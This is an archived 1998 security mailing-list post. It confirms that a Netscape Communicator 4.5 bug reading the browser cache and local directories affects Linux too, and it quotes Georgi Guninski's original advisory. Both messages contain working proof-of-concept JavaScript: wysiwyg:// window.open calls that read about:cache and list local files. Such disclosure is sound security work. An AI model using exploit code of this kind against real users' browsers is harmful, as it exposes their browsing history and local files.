Hello, Just wanted to add that Netscape Communicator 4.5b2 on Slackware Linux 3.5 (kernel 2.0.34) is susceptible to this also. I was able to get the script to read my cache. As for the local reading, with a little modification, it'll do that to. Example: the line in George's script that reads local files is - sl=window.open('wysiwyg://1/file:///c|/'); With just little change, taking the Linux directory structure into consideration and adding proper backslash escapes - sl=window.open('wysiwyg://1/file://\/'); That'll give you listing of '/' on the local box. (tsk, tsk, tsk) Regards, Ryan Gray http://www.sniper.org - Home of the Afterlife On Wed, 28 Oct 1998, Georgi Guninski wrote: > There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95 > (probably others) which allows reading user's cache (the urls the user > has > visited, including the info in GET forms). Reading local directories > content > is also allowed. This info may be sent to an arbitrary host. > The bug may be exploited by email. > > Demonstration is available at: > Cache reading: http://www.geocities.com/ResearchTriangle/1711/b4.html > Directory reading: > http://www.geocities.com/ResearchTriangle/1711/b5.html > > The javascript code is: > > sl=window.open('wysiwyg://1/about:cache'); > //For Netscape 3.04 remove 'wysiwyg://1/' > sl2=sl.window.open(); > sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here > are some links from your cache:\"; for(i=0;i<5;i++) > x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()"; > sl2.location.reload(); > > Workaround: Disable Javascript. > > Regards, > Georgi Guninski > http://www.geocities.com/ResearchTriangle/1711/ > > > ______________________________________________________ > Get Your Private, Free Email at http://www.hotmail.com >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:21:30 PDT